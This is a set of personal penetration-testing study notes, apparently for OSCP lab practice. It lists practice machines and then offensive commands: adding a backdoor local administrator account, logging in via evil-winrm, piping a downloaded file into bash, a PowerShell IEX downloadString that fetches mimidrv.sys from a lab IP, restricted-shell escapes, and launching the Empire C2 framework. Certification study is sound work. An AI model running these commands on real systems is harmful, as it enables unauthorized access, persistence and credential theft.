Notes

God notes

PG boxes on OSCP:

https://defaultcredentials.com/oscp/best-active-directory-practice-for-oscp/

Heist, Hutch, Vault, Resourced in PG Practice

HTB:

APT, Fuse, Cascade, Monteverde, Resolute, Forest, Arkham, Active, Mantis

CyberSecLabs:

Zero, Secret, Brute, Dictionary, Roast, Spray, Sync, Toast

Always look for config files if you have access to application files!

adds an admin account to the hosts

Try legion script for nmap scanning!

Always run nmap -sC (default scripts).

If you are running as a service account, you can create a local admin account:

net user gori passwd123! /add
net localgroup administrators gori /add

evil-winrm -i IP -u gori -p 'passwd123!' to log in as the account you just created

net user gori to check the account's group membership (privileges)

---

/etc/apache2 : look for config files here

Linux enum

ldd --version (shows the glibc version)

Transfer method (fetch and execute directly)

curl IP/file_name | bash (to execute it)

cat /etc/lsb-release

Transfer method (host the file, then pull it)

python -m SimpleHTTPServer 80 (Python 2; on Python 3 use python3 -m http.server 80)

-> curl -o outputfile IP/filename

Restricted shell? Try this:

ssh mindy@10.129.29.189 -t "bash --noprofile"

hacker@ahoafhoaf:~$ BASH_CMDS[a]=/bin/sh;a 

$ /bin/bash
bash: groups: command not found
hacker@ahoafhoaf:~$ export PATH=$PATH:/bin/
hacker@ahoafhoaf:~$ export PATH=$PATH:/usr/bin

---

Run sudo

IEX(New-Object Net.WebClient).downloadString('http://192.168.119.146:8080/mimidrv.sys')

docker run -it --name empire -v empire-data:/opt/Empire/data \
 -p 443:443 --entrypoint bash empireproject/empire
